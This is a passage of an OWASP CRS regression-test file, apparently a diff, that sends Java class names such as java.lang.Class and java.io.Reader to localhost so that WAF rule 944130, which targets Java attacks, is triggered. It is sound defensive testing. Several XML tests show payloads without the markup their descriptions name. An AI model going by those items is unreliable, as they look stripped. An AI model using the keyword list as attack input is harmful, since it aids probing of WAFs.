"localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.PrintStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-230 + desc: "Content-Type application/json arg value includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.PrintStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-231 + desc: "Content-Type application/json arg name includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.PrintStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-232 + desc: "Argument test includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.PushbackInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-233 + desc: "Argument name includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PushbackInputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-234 + desc: "Cookie test includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PushbackInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-235 + desc: "Cookie name includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.PushbackInputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-236 + desc: "Request header test includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PushbackInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-237 + desc: "XML attribute value includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-238 + desc: "XML element value includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PushbackInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-239 + desc: "Nested XML element value includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PushbackInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-240 + desc: "Content-Type text/plain includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.PushbackInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-241 + desc: "Content-Type application/json arg value includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.PushbackInputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-242 + desc: "Content-Type application/json arg name includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.PushbackInputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-243 + desc: "Argument test includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.Reader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-244 + desc: "Argument name includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.Reader=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-245 + desc: "Cookie test includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.Reader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-246 + desc: "Cookie name includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.Reader=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-247 + desc: "Request header test includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.Reader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-248 + desc: "XML attribute value includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-249 + desc: "XML element value includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.Reader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-250 + desc: "Nested XML element value includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.Reader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-251 + desc: "Content-Type text/plain includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.Reader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-252 + desc: "Content-Type application/json arg value includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.Reader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-253 + desc: "Content-Type application/json arg name includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.Reader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-254 + desc: "Argument test includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.StringReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-255 + desc: "Argument name includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.StringReader=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-256 + desc: "Cookie test includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.StringReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-257 + desc: "Cookie name includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.StringReader=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-258 + desc: "Request header test includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.StringReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-259 + desc: "XML attribute value includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-260 + desc: "XML element value includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.StringReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-261 + desc: "Nested XML element value includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.StringReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-262 + desc: "Content-Type text/plain includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.StringReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-263 + desc: "Content-Type application/json arg value includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.StringReader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-264 + desc: "Content-Type application/json arg name includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.StringReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-265 + desc: "Argument test includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Class" + output: + log_contains: "id \"944130\"" + - test_title: 944130-266 + desc: "Argument name includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Class=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-267 + desc: "Cookie test includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Class + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-268 + desc: "Cookie name includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Class=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-269 + desc: "Request header test includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Class + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-270 + desc: "XML attribute value includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-271 + desc: "XML element value includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Class" + output: + log_contains: "id \"944130\"" + - test_title: 944130-272 + desc: "Nested XML element value includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Class" + output: + log_contains: "id \"944130\"" + - test_title: 944130-273 + desc: "Content-Type text/plain includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Class" + output: + log_contains: "id \"944130\"" + - test_title: 944130-274 + desc: "Content-Type application/json arg value includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Class\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-275 + desc: "Content-Type application/json arg name includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.Class\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-276 + desc: "Argument test includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Integer" + output: + log_contains: "id \"944130\"" + - test_title: 944130-277 + desc: "Argument name includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Integer=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-278 + desc: "Cookie test includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Integer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-279 + desc: "Cookie name includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Integer=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-280 + desc: "Request header test includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Integer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-281 + desc: "XML attribute value includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-282 + desc: "XML element value includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Integer" + output: + log_contains: "id \"944130\"" + - test_title: 944130-283 + desc: "Nested XML element value includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + 